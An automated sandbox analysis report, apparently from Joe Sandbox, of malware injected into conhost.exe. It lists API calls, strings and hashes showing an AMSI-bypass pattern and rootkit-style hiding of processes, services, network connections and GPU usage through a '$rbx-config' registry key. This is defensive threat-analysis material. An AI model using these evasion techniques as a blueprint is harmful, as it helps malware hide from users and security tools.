Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 7dbb93ecc4044cf0b51a72b437f486b1054529f943d2880c9e7b3d7fe112b00c
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 46D01730615E23E1EA4AEF00EC5C3162221AB6CB44FD44458C00A022A0DE2EC45DC782

Function 0000026504EA3A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000026504EA3A35
PathFindFileNameW.SHLWAPI ref: 0000026504EA3A44

Part of subcall function 0000026504EA3F88: StrCmpNIW.SHLWAPI(?,?,?,0000026504EA272F), ref: 0000026504EA3FA0

Part of subcall function 0000026504EA3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000026504EA3A5B), ref: 0000026504EA3EDB
Part of subcall function 0000026504EA3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000026504EA3A5B), ref: 0000026504EA3F0E
Part of subcall function 0000026504EA3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000026504EA3A5B), ref: 0000026504EA3F2E
Part of subcall function 0000026504EA3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000026504EA3A5B), ref: 0000026504EA3F47
Part of subcall function 0000026504EA3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000026504EA3A5B), ref: 0000026504EA3F68

CreateThread.KERNELBASE ref: 0000026504EA3A8B

Part of subcall function 0000026504EA1E74: GetCurrentThread.KERNEL32 ref: 0000026504EA1E7F
Part of subcall function 0000026504EA1E74: CreateThread.KERNELBASE ref: 0000026504EA2043
Part of subcall function 0000026504EA1E74: TlsAlloc.KERNEL32 ref: 0000026504EA2049
Part of subcall function 0000026504EA1E74: TlsAlloc.KERNEL32 ref: 0000026504EA2055
Part of subcall function 0000026504EA1E74: TlsAlloc.KERNEL32 ref: 0000026504EA2061
Part of subcall function 0000026504EA1E74: TlsAlloc.KERNEL32 ref: 0000026504EA206D
Part of subcall function 0000026504EA1E74: TlsAlloc.KERNEL32 ref: 0000026504EA2079
Part of subcall function 0000026504EA1E74: TlsAlloc.KERNEL32 ref: 0000026504EA2085

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: 2cd676e8b31c73f0be9385a218093f38ea2a2b631a323e1c87103920123586ad
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: 7F117131B10F33D2FBA4D720A94D7AE6291AB5C349F504119DC86811D1EF7FE4788643

Function 0000026504E72EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 0000026504E7302E

Memory Dump Source

Source File: 00000025.00000003.2595945338.0000026504E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026504E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_3_26504e70000_conhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 0330f1d165dfe9604ac687950ba5c4c5d131114b62702952c720303385d842d2
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: AF911873B01A62C7DBA4CF25D608B7EB391F758BE4F5482249F4907788DA3AD812D701

Function 0000026504EA1BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000026504EA1724: GetProcessHeap.KERNEL32 ref: 0000026504EA172F
Part of subcall function 0000026504EA1724: HeapAlloc.KERNEL32 ref: 0000026504EA173E
Part of subcall function 0000026504EA1724: RegOpenKeyExW.ADVAPI32 ref: 0000026504EA17AE
Part of subcall function 0000026504EA1724: RegOpenKeyExW.ADVAPI32 ref: 0000026504EA17DB
Part of subcall function 0000026504EA1724: RegCloseKey.ADVAPI32 ref: 0000026504EA17F5
Part of subcall function 0000026504EA1724: RegOpenKeyExW.ADVAPI32 ref: 0000026504EA1815
Part of subcall function 0000026504EA1724: RegCloseKey.ADVAPI32 ref: 0000026504EA1830
Part of subcall function 0000026504EA1724: RegOpenKeyExW.ADVAPI32 ref: 0000026504EA1850
Part of subcall function 0000026504EA1724: RegCloseKey.ADVAPI32 ref: 0000026504EA186B
Part of subcall function 0000026504EA1724: RegOpenKeyExW.ADVAPI32 ref: 0000026504EA188B
Part of subcall function 0000026504EA1724: RegCloseKey.ADVAPI32 ref: 0000026504EA18A6
Part of subcall function 0000026504EA1724: RegOpenKeyExW.ADVAPI32 ref: 0000026504EA18C6

SleepEx.KERNELBASE ref: 0000026504EA1BDF

Part of subcall function 0000026504EA1724: RegCloseKey.ADVAPI32 ref: 0000026504EA18E1
Part of subcall function 0000026504EA1724: RegOpenKeyExW.ADVAPI32 ref: 0000026504EA1901
Part of subcall function 0000026504EA1724: RegCloseKey.ADVAPI32 ref: 0000026504EA191C
Part of subcall function 0000026504EA1724: RegOpenKeyExW.ADVAPI32 ref: 0000026504EA193C
Part of subcall function 0000026504EA1724: RegCloseKey.ADVAPI32 ref: 0000026504EA1957
Part of subcall function 0000026504EA1724: RegOpenKeyExW.ADVAPI32 ref: 0000026504EA1977
Part of subcall function 0000026504EA1724: RegCloseKey.ADVAPI32 ref: 0000026504EA1992
Part of subcall function 0000026504EA1724: RegCloseKey.ADVAPI32 ref: 0000026504EA199C

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: 4a0a26ae3055c26c183cc6561d6818b90172101ba6bc5bbcf606c35cc31aafff
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: 74314179300E63C1FB58DB27D5483A9E3A5EB4CBC0F0454619E09873D6EE26E8718317

Non-executed Functions

Function 0000026504EA2FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000026504EA3094
lstrlenW.KERNEL32 ref: 0000026504EA32BE

Part of subcall function 0000026504EA1A30: OpenProcess.KERNEL32 ref: 0000026504EA1A56
Part of subcall function 0000026504EA1A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000026504EA1A74
Part of subcall function 0000026504EA1A30: PathFindFileNameW.SHLWAPI ref: 0000026504EA1A83
Part of subcall function 0000026504EA1A30: lstrlenW.KERNEL32 ref: 0000026504EA1A8F
Part of subcall function 0000026504EA1A30: StrCpyW.SHLWAPI ref: 0000026504EA1AA2
Part of subcall function 0000026504EA1A30: CloseHandle.KERNEL32 ref: 0000026504EA1AB0

GetProcAddress.KERNEL32 ref: 0000026504EA30A9

Part of subcall function 0000026504EA3F88: StrCmpNIW.SHLWAPI(?,?,?,0000026504EA272F), ref: 0000026504EA3FA0

StrCmpNIW.SHLWAPI ref: 0000026504EA30EC
lstrlenW.KERNEL32 ref: 0000026504EA3214

Strings

ntdll.dll, xrefs: 0000026504EA308D
NtQueryObject, xrefs: 0000026504EA309F
\Device\Nsi, xrefs: 0000026504EA30DF

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 20fbb97bfd9f556be3359b22d590838a28185d043352358c0ff25e75f835a07a
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: A3B1E132314EB2C2EB69CF26D4087AAA3A4F74CB88F545016EE0953B94DF36DCA4C341

Function 0000026504EA84B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000026504EA84CC
RtlCaptureContext.NTDLL ref: 0000026504EA84F9
RtlLookupFunctionEntry.NTDLL ref: 0000026504EA8513
RtlVirtualUnwind.NTDLL ref: 0000026504EA8554
IsDebuggerPresent.KERNEL32 ref: 0000026504EA85A8
SetUnhandledExceptionFilter.KERNEL32 ref: 0000026504EA85C5
UnhandledExceptionFilter.KERNEL32 ref: 0000026504EA85D0

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 77824d61712215dd8e47e5dbc171aac6306ee6421f31e26b2471c8dfd60d1ee2
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 57315572205F91DAEB60DF60E8883EE7364F788748F44402ADA4E47B99EF39C658C711

Function 0000026504EACD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000026504EACE0B
RtlLookupFunctionEntry.NTDLL ref: 0000026504EACE23
RtlVirtualUnwind.NTDLL ref: 0000026504EACE5E
IsDebuggerPresent.KERNEL32 ref: 0000026504EACE97
SetUnhandledExceptionFilter.KERNEL32 ref: 0000026504EACEA1
UnhandledExceptionFilter.KERNEL32 ref: 0000026504EACEAC

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 1d60a88a30d1ad5a66103074b4f236235bd807cd550f8f5efba6955e4890ee39
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 68418E36214F91D6EB60CF24E8483AE73A4F788758F500216EB8D47BA9DF39C559CB41

Function 0000026504EADA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 0000026504EADB99
FindNextFileW.KERNEL32 ref: 0000026504EADCCF
FindClose.KERNEL32 ref: 0000026504EADD0F
FindClose.KERNEL32 ref: 0000026504EADD3B

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 12f7e991f466f5409af2cb05b307022dc33fdb97a698e47539e44fdefb96c64e
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 27A16E32704FA2C9FB60DB75DC48BED6BA2E789794F144115DE8827FA5CA3AD051C302

Function 0000026504EA1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000026504EA172F
HeapAlloc.KERNEL32 ref: 0000026504EA173E

Part of subcall function 0000026504EA1264: GetProcessHeap.KERNEL32 ref: 0000026504EA126A
Part of subcall function 0000026504EA1264: HeapAlloc.KERNEL32 ref: 0000026504EA1279
Part of subcall function 0000026504EA1264: GetProcessHeap.KERNEL32 ref: 0000026504EA1293
Part of subcall function 0000026504EA1264: HeapAlloc.KERNEL32 ref: 0000026504EA12A4

Part of subcall function 0000026504EA1000: GetProcessHeap.KERNEL32 ref: 0000026504EA1006
Part of subcall function 0000026504EA1000: HeapAlloc.KERNEL32 ref: 0000026504EA1015
Part of subcall function 0000026504EA1000: GetProcessHeap.KERNEL32 ref: 0000026504EA1028
Part of subcall function 0000026504EA1000: HeapAlloc.KERNEL32 ref: 0000026504EA1037

RegOpenKeyExW.ADVAPI32 ref: 0000026504EA17AE
RegOpenKeyExW.ADVAPI32 ref: 0000026504EA17DB
RegCloseKey.ADVAPI32 ref: 0000026504EA17F5
RegOpenKeyExW.ADVAPI32 ref: 0000026504EA1815
RegCloseKey.ADVAPI32 ref: 0000026504EA1830
RegOpenKeyExW.ADVAPI32 ref: 0000026504EA1850
RegCloseKey.ADVAPI32 ref: 0000026504EA186B
RegOpenKeyExW.ADVAPI32 ref: 0000026504EA188B
RegCloseKey.ADVAPI32 ref: 0000026504EA18A6
RegOpenKeyExW.ADVAPI32 ref: 0000026504EA18C6
RegCloseKey.ADVAPI32 ref: 0000026504EA18E1
RegOpenKeyExW.ADVAPI32 ref: 0000026504EA1901
RegCloseKey.ADVAPI32 ref: 0000026504EA191C
RegOpenKeyExW.ADVAPI32 ref: 0000026504EA193C
RegCloseKey.ADVAPI32 ref: 0000026504EA1957
RegOpenKeyExW.ADVAPI32 ref: 0000026504EA1977
RegCloseKey.ADVAPI32 ref: 0000026504EA1992
RegCloseKey.ADVAPI32 ref: 0000026504EA199C

Part of subcall function 0000026504EA12B8: RegQueryInfoKeyW.ADVAPI32 ref: 0000026504EA1315
Part of subcall function 0000026504EA12B8: GetProcessHeap.KERNEL32 ref: 0000026504EA1323
Part of subcall function 0000026504EA12B8: HeapAlloc.KERNEL32 ref: 0000026504EA1334
Part of subcall function 0000026504EA12B8: RegEnumValueW.ADVAPI32 ref: 0000026504EA1393
Part of subcall function 0000026504EA12B8: GetProcessHeap.KERNEL32 ref: 0000026504EA13DB
Part of subcall function 0000026504EA12B8: HeapAlloc.KERNEL32 ref: 0000026504EA13E9
Part of subcall function 0000026504EA12B8: GetProcessHeap.KERNEL32 ref: 0000026504EA1406
Part of subcall function 0000026504EA12B8: HeapFree.KERNEL32 ref: 0000026504EA1414
Part of subcall function 0000026504EA12B8: lstrlenW.KERNEL32 ref: 0000026504EA141D
Part of subcall function 0000026504EA12B8: GetProcessHeap.KERNEL32 ref: 0000026504EA142B
Part of subcall function 0000026504EA12B8: HeapAlloc.KERNEL32 ref: 0000026504EA1439

Strings

process_names, xrefs: 0000026504EA1849
paths, xrefs: 0000026504EA1884
pid, xrefs: 0000026504EA180E
SOFTWARE\$rbx-config, xrefs: 0000026504EA178E
tcp_local, xrefs: 0000026504EA18FA
startup, xrefs: 0000026504EA17D1
service_names, xrefs: 0000026504EA18BF
udp, xrefs: 0000026504EA1970
tcp_remote, xrefs: 0000026504EA1935

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: f953eadb07875e8a9e2496f5d6cbf4ad833a91bd66c2b840444ea8b956270ec8
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 10712836210F66D6EB10DF21E89869E63A5FB8CB8CF441121DE4D43B28DF3AC458C381

Function 0000026504EA12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000026504EA1315
GetProcessHeap.KERNEL32 ref: 0000026504EA1323
HeapAlloc.KERNEL32 ref: 0000026504EA1334
RegEnumValueW.ADVAPI32 ref: 0000026504EA1393

Part of subcall function 0000026504EA1530: StrCmpIW.SHLWAPI ref: 0000026504EA1561

GetProcessHeap.KERNEL32 ref: 0000026504EA13DB
HeapAlloc.KERNEL32 ref: 0000026504EA13E9
GetProcessHeap.KERNEL32 ref: 0000026504EA1406
HeapFree.KERNEL32 ref: 0000026504EA1414
lstrlenW.KERNEL32 ref: 0000026504EA141D
GetProcessHeap.KERNEL32 ref: 0000026504EA142B
HeapAlloc.KERNEL32 ref: 0000026504EA1439
StrCpyW.SHLWAPI ref: 0000026504EA145B
GetProcessHeap.KERNEL32 ref: 0000026504EA1472
HeapFree.KERNEL32 ref: 0000026504EA1480

Strings

d, xrefs: 0000026504EA1356

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: f1b42172e25e378621cac28406f5f78802e805ed928871f45552b209e44d79de
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: A6515832210F95EAEB65CF66E84839AB7A1F788F98F444124DE4A07728EF3DC059C741

Function 0000026504EAEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,0000026504EAF34A,?,?,00000000,0000026504EAF2CD), ref: 0000026504EAEFF5
GetLastError.KERNEL32(?,?,00000000,0000026504EAF2CD), ref: 0000026504EAF007
LoadLibraryExW.KERNEL32(?,?,00000000,0000026504EAF2CD), ref: 0000026504EAF049
VirtualProtect.KERNEL32 ref: 0000026504EAF0A5
VirtualProtect.KERNEL32 ref: 0000026504EAF0D6
FreeLibrary.KERNEL32(?,?,00000000,0000026504EAF2CD), ref: 0000026504EAF11A
GetProcAddress.KERNEL32(?,?,00000000,0000026504EAF2CD), ref: 0000026504EAF126

Strings

AppPolicyGetProcessTerminationMethod, xrefs: 0000026504EAF157, 0000026504EAF165
api-ms-, xrefs: 0000026504EAF01B
ext-ms-, xrefs: 0000026504EAF02E

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: a30cf240d0d21fcbf048c9e9b557f4dec90e83ad4ae2168b076acf1b4669581c
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 0151E131700F26D1EA25DF56A8483AA2390BB4CBB0F5807259E3D077D1EF3AE419C782

Function 0000026504EA33A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PdhGetCounterInfoW.PDH ref: 0000026504EA33FD
GetProcessHeap.KERNEL32 ref: 0000026504EA3412
HeapAlloc.KERNEL32 ref: 0000026504EA3420
PdhGetCounterInfoW.PDH ref: 0000026504EA3436
StrCmpW.SHLWAPI ref: 0000026504EA344B

Part of subcall function 0000026504EA3950: StrCmpNW.SHLWAPI ref: 0000026504EA3972
Part of subcall function 0000026504EA3950: StrStrW.SHLWAPI ref: 0000026504EA3990
Part of subcall function 0000026504EA3950: StrToIntW.SHLWAPI ref: 0000026504EA39B7

GetProcessHeap.KERNEL32 ref: 0000026504EA3488
HeapFree.KERNEL32 ref: 0000026504EA3496

Strings

\GPU Engine(*)\Running Time, xrefs: 0000026504EA3444

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: bfa4ea229b3006601e921d5865d26c4459f3ace4a01edbe53ca46975f0687476
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 9B31E632604F62E7E722CF52E80C75AA3A0F78CBD9F440625DE4943B24DF39D46A8741

Function 0000026504EA34B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PdhGetCounterInfoW.PDH ref: 0000026504EA3516
GetProcessHeap.KERNEL32 ref: 0000026504EA3527
HeapAlloc.KERNEL32 ref: 0000026504EA3535
PdhGetCounterInfoW.PDH ref: 0000026504EA354B
StrCmpW.SHLWAPI ref: 0000026504EA3560

Part of subcall function 0000026504EA3950: StrCmpNW.SHLWAPI ref: 0000026504EA3972
Part of subcall function 0000026504EA3950: StrStrW.SHLWAPI ref: 0000026504EA3990
Part of subcall function 0000026504EA3950: StrToIntW.SHLWAPI ref: 0000026504EA39B7

